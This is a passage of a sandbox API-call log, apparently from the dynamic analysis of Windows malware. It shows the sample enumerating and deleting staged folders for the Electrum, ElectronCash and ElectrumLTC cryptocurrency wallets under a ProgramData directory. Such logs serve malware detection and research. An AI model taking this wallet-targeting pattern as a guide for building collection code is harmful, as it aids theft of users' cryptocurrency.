cFileName="..", cAlternateFileName="")) returned 1 [0116.515] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" [0116.515] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\" [0116.515] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\.." [0116.515] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\ElectronCash" | out: lpString1="\\Wallets\\ElectronCash") returned="\\Wallets\\ElectronCash" [0116.515] lstrcatW (in: lpString1="\\Wallets\\ElectronCash", lpString2="\\" | out: lpString1="\\Wallets\\ElectronCash\\") returned="\\Wallets\\ElectronCash\\" [0116.515] lstrcatW (in: lpString1="\\Wallets\\ElectronCash\\", lpString2=".." | out: lpString1="\\Wallets\\ElectronCash\\..") returned="\\Wallets\\ElectronCash\\.." [0116.515] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.515] FindNextFileW (in: hFindFile=0x7439e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632e935, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632e935, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632e935, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.515] FindClose (in: hFindFile=0x7439e0 | out: hFindFile=0x7439e0) returned 1 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x44) returned 0x38eb6f8 [0116.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", cchWideChar=68, lpMultiByteStr=0x38eb6f8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", lpUsedDefaultChar=0x0) returned 68 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eabb0 [0116.516] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb6f8 | out: hHeap=0x29a0000) returned 1 [0116.516] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a69b8 [0116.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a69b8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.516] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69b8 | out: hHeap=0x29a0000) returned 1 [0116.516] PathMatchSpecW (pszFile="ElectronCash", pszSpec="*.*") returned 1 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700e0 [0116.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x44) returned 0x38eb3d8 [0116.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", cchWideChar=68, lpMultiByteStr=0x38eb3d8, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", lpUsedDefaultChar=0x0) returned 68 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38ea9a0 [0116.516] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb3d8 | out: hHeap=0x29a0000) returned 1 [0116.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\ElectronCash", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e80 [0116.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\ElectronCash", cchWideChar=22, lpMultiByteStr=0x3970e80, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\ElectronCash", lpUsedDefaultChar=0x0) returned 22 [0116.516] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0116.516] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e80 | out: hHeap=0x29a0000) returned 1 [0116.516] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\electroncash"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.517] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705d8 | out: hHeap=0x29a0000) returned 1 [0116.517] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea9a0 | out: hHeap=0x29a0000) returned 1 [0116.517] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700e0 | out: hHeap=0x29a0000) returned 1 [0116.517] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.517] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\electroncash")) returned 0 [0116.517] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eabb0 | out: hHeap=0x29a0000) returned 1 [0116.517] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632aec7, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632aec7, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632aec7, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Electrum", cAlternateFileName="")) returned 1 [0116.517] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.517] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.517] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="Electrum" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" [0116.517] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.517] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.517] lstrcatW (in: lpString1="\\Wallets\\", lpString2="Electrum" | out: lpString1="\\Wallets\\Electrum") returned="\\Wallets\\Electrum" [0116.517] lstrcmpW (lpString1="Electrum", lpString2=".") returned 1 [0116.517] lstrcmpW (lpString1="Electrum", lpString2="..") returned 1 [0116.517] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" [0116.517] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\*.*" [0116.517] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632aec7, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632aec7, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632aec7, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743320 [0116.517] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" [0116.517] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\" [0116.517] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\." [0116.517] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Electrum" | out: lpString1="\\Wallets\\Electrum") returned="\\Wallets\\Electrum" [0116.517] lstrcatW (in: lpString1="\\Wallets\\Electrum", lpString2="\\" | out: lpString1="\\Wallets\\Electrum\\") returned="\\Wallets\\Electrum\\" [0116.517] lstrcatW (in: lpString1="\\Wallets\\Electrum\\", lpString2="." | out: lpString1="\\Wallets\\Electrum\\.") returned="\\Wallets\\Electrum\\." [0116.518] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.518] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632aec7, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632aec7, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632aec7, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.518] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" [0116.518] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\" [0116.518] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum\\.." [0116.518] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Electrum" | out: lpString1="\\Wallets\\Electrum") returned="\\Wallets\\Electrum" [0116.518] lstrcatW (in: lpString1="\\Wallets\\Electrum", lpString2="\\" | out: lpString1="\\Wallets\\Electrum\\") returned="\\Wallets\\Electrum\\" [0116.518] lstrcatW (in: lpString1="\\Wallets\\Electrum\\", lpString2=".." | out: lpString1="\\Wallets\\Electrum\\..") returned="\\Wallets\\Electrum\\.." [0116.518] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.518] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.518] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632aec7, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632aec7, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632aec7, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.518] FindClose (in: hFindFile=0x743320 | out: hFindFile=0x743320) returned 1 [0116.518] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a8c38 [0116.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0116.518] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a08 [0116.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", cchWideChar=64, lpMultiByteStr=0x29a2a08, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", lpUsedDefaultChar=0x0) returned 64 [0116.518] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ae0 [0116.518] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0116.518] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a8c38 | out: hHeap=0x29a0000) returned 1 [0116.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.518] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a68b8 [0116.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a68b8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.518] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68b8 | out: hHeap=0x29a0000) returned 1 [0116.518] PathMatchSpecW (pszFile="Electrum", pszSpec="*.*") returned 1 [0116.518] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9540 [0116.518] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f78 [0116.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0116.519] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0116.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", cchWideChar=64, lpMultiByteStr=0x29a2db0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum", lpUsedDefaultChar=0x0) returned 64 [0116.519] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0116.519] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 [0116.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Electrum", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.519] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ee0 [0116.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Electrum", cchWideChar=18, lpMultiByteStr=0x3970ee0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\Electrum", lpUsedDefaultChar=0x0) returned 18 [0116.519] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0116.519] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ee0 | out: hHeap=0x29a0000) returned 1 [0116.519] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\electrum"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.519] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0116.519] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0116.519] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f78 | out: hHeap=0x29a0000) returned 1 [0116.519] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9540 | out: hHeap=0x29a0000) returned 1 [0116.519] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Electrum" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\electrum")) returned 0 [0116.519] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0116.519] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ElectrumLTC", cAlternateFileName="ELECTR~1")) returned 1 [0116.519] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.519] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.519] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="ElectrumLTC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" [0116.519] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.519] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.519] lstrcatW (in: lpString1="\\Wallets\\", lpString2="ElectrumLTC" | out: lpString1="\\Wallets\\ElectrumLTC") returned="\\Wallets\\ElectrumLTC" [0116.520] lstrcmpW (lpString1="ElectrumLTC", lpString2=".") returned 1 [0116.520] lstrcmpW (lpString1="ElectrumLTC", lpString2="..") returned 1 [0116.520] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" [0116.520] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\*.*" [0116.520] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437e0 [0116.520] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC" [0116.520] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\" [0116.520] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectrumLTC\\." [0116.520] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\ElectrumLTC" | out: lpString1="\\Wallets\\ElectrumLTC") returned="\\Wallets\\ElectrumLTC" [0116.520] lstrcatW (in: lpString1="\\Wallets\\ElectrumLTC", lpString2="\\" | out: lpString1="\\Wallets\\ElectrumLTC\\") returned="\\Wallets\\ElectrumLTC\\" [0116.520] lstrcatW (in: lpString1="\\Wallets\\ElectrumLTC\\", lpString2="." | out: lpString1="\\Wallets\\ElectrumLTC\\.") returned="\\Wallets\\ElectrumLTC\\." [0116.520] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.520] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632d616, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632d616, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632d616, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.520] 